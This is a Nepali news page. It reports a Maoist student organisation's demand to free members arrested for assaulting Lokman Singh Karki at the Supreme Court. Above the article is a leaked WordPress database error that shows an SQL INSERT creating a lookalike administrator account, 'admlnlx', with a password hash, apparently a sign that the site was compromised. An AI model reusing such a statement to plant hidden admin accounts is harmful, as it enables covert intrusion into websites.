WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6X2fkelTELKQELWGuQYOMAuKF.x1S0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:45:47', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ८-
नेत्रविक्रम चन्द नेतृत्वको नेकपा माओवादीको विद्यार्थी संगठन अखिल क्रान्तिकारीले आज सर्वोच्च अदालत परिसरमा लोकमानसिंह कार्कीमाथि दुर्व्यवहार गर्ने आफ्ना कार्यकर्ता रिहाईको माग गरेको छ ।
अखिल क्रान्तिकारीका अध्यक्ष पूर्णबहादुर सिंहले जारी गरेको विज्ञप्तिमा अख्तियार दुरुपयोग अनुसन्धान आयोगका निलम्बित प्रमुख आयुक्त कार्कीलाई नेपालको नामुद भ्रष्टु को आरोप लगाउँदै उनीमाथि कारवाहीको क्रममा आफ्नो संगठनका केन्द्रीय सदस्य द्वय प्रकाश शाही र चन्द्र बुढालाई प्रहरीले गिरफ्तार गरेको घटनाप्रति संगठनको गम्भीर ध्यानाकर्षण भएको उल्लेख गरिएको छ ।
“हाम्रा साथिहरुलाई बिनाशर्त रिहाईको माग गर्दछौँ । साथै भ्रष्टाचार, कालोबजारी र महंगीविरुद्धको अभियान जारी छ,” विज्ञप्तिमा उल्लेख छ । कार्कीमाथिको आक्रमण कारवाही ठिक भएको दाबी गर्दै संगठनका महासचिव दिपेन्द्र चलाउनेले अन्याय गर्नेका विरुद्ध आफ्नो संगठन निरन्तर लडिरहने बताएका छन् ।